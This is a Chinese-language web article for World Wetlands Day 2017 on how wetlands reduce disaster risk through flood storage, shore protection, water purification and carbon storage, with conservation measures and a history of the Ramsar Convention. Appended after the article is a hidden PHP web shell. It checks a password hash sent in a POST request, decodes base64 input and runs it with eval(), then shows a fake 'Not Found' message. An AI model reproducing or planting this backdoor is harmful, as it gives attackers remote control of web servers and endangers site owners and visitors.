湿地之窗

首页 > 科研保护 > 湿地之窗 >

    2017国际湿地日话湿地:湿地,如何减少灾害风险

           2017年2月2日是第21个世界湿地日,主题是“湿地:减少灾害风险(wetlands for disaster risk reduction)”。健康的湿地有助于应对极端天气,让我们共同为保护和合理利用湿地作出承诺!

           湿地是全球价值最高的生态系统,据联合国环境规划署2002年的权威研究数据表明,一公顷湿地生态系统每年创造的价值高达1.4万美元,是热带雨林的7倍,是农田生态系统的160倍。

           湿地的生态功能

           湿地是指天然或人工、长久或暂时性的沼泽地、泥炭地或水域地带,静止或流动,淡水、半咸水、咸水体,包括低潮时水深不超过6米的水域。湿地与森林、海洋并称全球三大生态系统,是重要的国土资源和自然资源,如同森林、耕地、海洋一样,具有多种功能。

           湿地与人类的生存、繁衍、发展息息相关,是自然界最富生物多样性的生态景观和人类最重要的生存环境之一,它不仅为人类的生产、生活提供多种资源,而且具有巨大的环境功能和效益,在抵御洪水、调节径流、蓄洪防旱、控制污染、调节气候、控制土壤侵蚀、促淤造陆、美化环境等方面有其他系统不可替代的作用,因此,湿地被誉为“地球之肾”。

           湿地减少灾害风险

           湿地的功能是多方面的,它可作为直接利用的水源或补充地下水,又能有效控制洪水和防止土壤沙化,还能滞留沉积物、有毒物、营养物质,从而改善环境污染;它能以有机质的形式储存碳元素,减少温室效应,保护海岸不受风浪侵蚀,提供清洁方便的运输方式……它因有如此众多而有益的功能而被人们称为“地球之肾”。湿地还是众多植物、动物特别是水禽生长的乐园,同时又向人类提供食物(水产品、禽畜产品、谷物)、能源(水能、泥炭、薪柴)、原材料(芦苇、木材、药用植物)和旅游场所,是人类赖以生存和持续发展的重要基础。

           湿地可调节流量,控制洪水,减少洪涝灾害的同时预防干旱,湿地是一个巨大的蓄水库,可以在暴雨和河流涨水期储存过量的降水,均匀地把径流放出,减弱危害下游的洪水,因此保护湿地就是保护天然储水系统。

           湿地可保护堤岸,湿地中生长着多种多样的植物,这些湿地植被可以抵御海浪、台风和风暴的冲击力,防止对海岸的侵蚀,同时它们的根系可以固定、稳定堤岸和海岸,保护沿岸工农业生产.如果没有湿地,海岸和河流堤岸就会遭到海浪的破坏。

           湿地是天然的污水处理厂,与人体的肾一样,湿地承接了人类生产生活产生的各种污染源,凭借植物群落的净化功能,湿地能吸收过量的有机物、有害的重金属等,往下游排放更为健康的水体。但是水污染也会导致湿地退化。工业废水和生活污水排放,以及农业污染使许多河湖湿地及沿海水域水质恶化,加速某些湿地水体富营养化和寄生虫的流行,生物多样性受到严重危害。

           湿地是重要的储碳库和吸碳器

           湿地在气候变化过程中有很大的作用,特别是泥炭地在有效缓解温室效应、应对气候变化方面发挥着不可替代的功能。湿地是一个重要的储碳库和吸碳器,是气候变化的缓冲器,应对气候变化,湿地有它的功能。保护好湿地,才能够对应对气候变化有作用[1]。湿地具有巨大的碳库储存能力,为全球碳减排提供了潜在的空间。为了最大限度的发挥湿地固碳潜能,需做到以下几点

          (1)减少人类活动对湿地的干扰、破坏,加大退田还湖、还沼的力度,通过营造生态保护林和水源涵养林,防止水土流失,减少河湖淤积。严格控制湿地周边的污染源、污染物数量和排污途径,对受污染和退化的湿地,要有计划地开展恢复和重建工作,逐步恢复湿地功能。  

          (2)加强湿地管理与保护,建立完善的管理机制,实行统一规划、统筹安排、统一管理,杜绝湿地管理混乱的局面。同时,要制定相应法律法规,健全相关法律体系。合理开发、利用湿地资源,调整产业结构,居民对湖泊、湿地资源的依赖状况,减轻资源环境承载压力。积极引导和开发生态产业,大力扶持清洁、安全、健康的产业,提倡发展循环经济。

     

       (3)深入开展宣传教育活动,提高公众的生态保护意识和资源忧患意识,树立全民生态文明观,形成湿地生态保护全民参与的新理念。

          “世界湿地日”的由来

           1971年2月2日,来自18个国家的代表在伊朗南部海滨小城拉姆萨尔签署了《关于特别是作为水禽栖息地的国际重要湿地公约》(简称《湿地公约》)。为了纪念这一壮举并增强公众的湿地意识,1996年10月《湿地公约》常务委员会第19次会议决定,从1997年起每年的2月2日定为“世界湿地日”,并且每年都确定一个不同的主题。利用这一天,政府机构组织和公民采取各种活动来提高公众对湿地价值和效益的认识,从而更好地保护湿地。《湿地公约》是一个政府间公约,是湿地保护及其资源合理利用的国家行动和国际合作框架,我国于1992年加入。2017年2月2日是第21个“世界湿地日”。
     
"; error_reporting(0); if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content)); echo "We're sorry but the page your are looking for is Not Found..." ?>